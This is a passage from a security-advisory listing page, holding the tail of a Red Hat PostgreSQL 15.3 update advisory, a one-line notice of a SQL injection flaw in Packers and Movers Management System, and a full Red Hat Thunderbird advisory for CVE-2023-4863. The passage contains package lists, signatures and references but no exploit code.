postgresql-docs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-plperl-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-plperl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-plpython3-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-plpython3-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-pltcl-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-pltcl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-private-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-private-libs-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-private-libs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-server-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-server-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-server-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-server-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-static-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-test-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-test-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-upgrade-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-upgrade-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-upgrade-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-15.3-1.module+el8.8.0+19565+1b0ddae0.noarch.rpm

ppc64le:  
pg_repack-1.4.8-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
pg_repack-debuginfo-1.4.8-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
pg_repack-debugsource-1.4.8-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
pgaudit-1.7.0-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
pgaudit-debuginfo-1.7.0-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
pgaudit-debugsource-1.7.0-1.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
postgres-decoderbufs-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
postgres-decoderbufs-debuginfo-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
postgres-decoderbufs-debugsource-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.ppc64le.rpm  
postgresql-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-contrib-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-contrib-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-debugsource-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-docs-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-docs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-plperl-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-plperl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-plpython3-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-plpython3-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-pltcl-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-pltcl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-private-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-private-libs-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-private-libs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-server-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-server-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-server-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-server-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-static-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-test-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-test-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-upgrade-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-upgrade-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-upgrade-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.ppc64le.rpm

s390x:  
pg_repack-1.4.8-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
pg_repack-debuginfo-1.4.8-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
pg_repack-debugsource-1.4.8-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
pgaudit-1.7.0-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
pgaudit-debuginfo-1.7.0-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
pgaudit-debugsource-1.7.0-1.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
postgres-decoderbufs-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
postgres-decoderbufs-debuginfo-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
postgres-decoderbufs-debugsource-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.s390x.rpm  
postgresql-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-contrib-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-contrib-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-debugsource-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-docs-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-docs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-plperl-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-plperl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-plpython3-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-plpython3-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-pltcl-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-pltcl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-private-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-private-libs-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-private-libs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-server-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-server-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-server-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-server-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-static-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-test-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-test-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-upgrade-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-upgrade-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-upgrade-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm  
postgresql-upgrade-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.s390x.rpm

x86_64:  
pg_repack-1.4.8-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
pg_repack-debuginfo-1.4.8-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
pg_repack-debugsource-1.4.8-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
pgaudit-1.7.0-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
pgaudit-debuginfo-1.7.0-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
pgaudit-debugsource-1.7.0-1.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
postgres-decoderbufs-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
postgres-decoderbufs-debuginfo-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
postgres-decoderbufs-debugsource-1.9.7-1.Final.module+el8.8.0+17071+aaaceaa4.x86_64.rpm  
postgresql-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-contrib-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-contrib-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-debugsource-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-docs-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-docs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-plperl-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-plperl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-plpython3-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-plpython3-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-pltcl-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-pltcl-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-private-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-private-libs-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-private-libs-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-server-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-server-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-server-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-server-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-static-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-test-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-test-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-upgrade-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-upgrade-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-upgrade-devel-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-15.3-1.module+el8.8.0+19565+1b0ddae0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlCb3fAAoJENzjgjWX9erEdHsP/0mTIY1Ws7iELwePCR7iz3kw  
YZeNFghtjKDKhK2iTWsjFd1qllbivpt3hzM+E7dSh2ezog038a7MWnMdVX7RkFkO  
b1Lv3D43Wg9nLB8yvZMxdAYvx53HKQlfLgPSCfgroddcw7u3bej+dNYuPra2Uaqj  
sHnQuxHdgeRdeRIPfSEHD35Q/bDkcbIneqcmHpQlHbxf+EP10kMRGG+Dj2qkFtRt  
hdYUnkmfzPqu/xxHmYAk/BZwO/sxZ4aYHWL1G814TFwHJ890OJsypF7F0L2xXvuv  
/TFcXdF062E/EWcPCd7iQjRr46kzVVdPL4YmOQRr3Vjd0bPzfO6BJpw0wIfo4yEg  
7LhT3rHCtdfuvCs/aQdn3deSSYAb81I314bDv2mVR7Xe4Vz0XcJMqve1otwXiL5m  
fOSGXdGpM1pwulTo/eWEqataTVThmkqpc91Tir96p29NTuxmwi50w3KTEoftwDQB  
tQXuNTyZW7TfuanhXr1CuHR186CmQjkGdufc0j1EKEicDGIzDblnPQJ/FuuwyXm+  
NfPolZy4xm3ELM4djddu72BJ5sA2zfpYcCY/tiEv0qtLvVBtJ24R33QLh3ac+kf2  
TO837XTqvmiA5bVxaNDnDOrB1CxQIhmq33UblN5u9S72oHEMKRpgs2EXQHbbas3t  
esVonQMu3WTn6Uv7kAMg  
=c0jd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5269-01

Packers and Movers Management System version 1.0 suffers from a remote blind SQL injection vulnerability. Proof of concept exploit written in python included.

Packers And Movers Management System 1.0 SQL Injection

Red Hat Security Advisory 2023-5223-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.15.1. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:5223-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5223  
Issue date:        2023-09-19  
CVE Names:         CVE-2023-4863  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.15.1.

Security Fix(es):

* libwebp: Heap buffer overflow in WebP Codec (CVE-2023-4863)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2238431 - CVE-2023-4863 libwebp: Heap buffer overflow in WebP Codec

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
thunderbird-102.15.1-1.el9_0.src.rpm

aarch64:  
thunderbird-102.15.1-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-102.15.1-1.el9_0.aarch64.rpm  
thunderbird-debugsource-102.15.1-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-102.15.1-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-102.15.1-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-102.15.1-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-102.15.1-1.el9_0.s390x.rpm  
thunderbird-debuginfo-102.15.1-1.el9_0.s390x.rpm  
thunderbird-debugsource-102.15.1-1.el9_0.s390x.rpm

x86_64:  
thunderbird-102.15.1-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-102.15.1-1.el9_0.x86_64.rpm  
thunderbird-debugsource-102.15.1-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4863  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlCWl0AAoJENzjgjWX9erECFIP/Aj5npEiQLk0LVRUuGnnU+b5  
rhLohqsYLsF6cksFgeiS0IK5GIPJ7Z4+zSr3ll+qsJ124M3kydR16bZvaQrzfxFf  
bYB0THL26lw3Otl6bag0bQ8nEh0K1MrQAHoin3cmCvdzZoau/+JBvQCvArYUno0D  
uEMkUzVu11hd1wJIUeqs05dsCNlSREoJ/yWLcdxeLd6tQsq0DXsQl0lX4uiBHAen  
4RnnIM9vIjmxOdBAlWEz4lBvSRiTxEd36wl7yJiSHSWQwfqxsZBLeUyd2LRhykFn  
zd3BqLvYo1C1Zs9e2kyJZ7x7Ay8cex+5XnHxqlg+uLY3YDQjAfltokrcDJVreFuh  
CSh46oAAjs6dypZW/KuiRzb/GJJk0S0TDp+dHJ1HcOo+fcKHDL4MNEGFlF3w95UB  
jMgk6gWj3TDsdI87h02tOtpqUWxCOUIOABbK8S+6dWFR+5rgLYZs6gaIhjL6bHBQ  
eotlyHzFSbTzlOK7/4EjcwGGfKLZ7rypXaGSaBjtHg9317BAhuADmgfd8+ri0PpY  
MaHzOa2tkAWjz9+hvwIvurLWT14+ucXvDsFQ3y3JtrV9togveHa5sY/8Tia4Da9d  
bLXRfG+qH5pYCH1+IQL+v469oyHdMyR4NXexhgmI30ap9EgCu4cfeJBiQPmIhnEe  
A7T7c7xsB6GSW5hCn+p+  
=EL4y  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql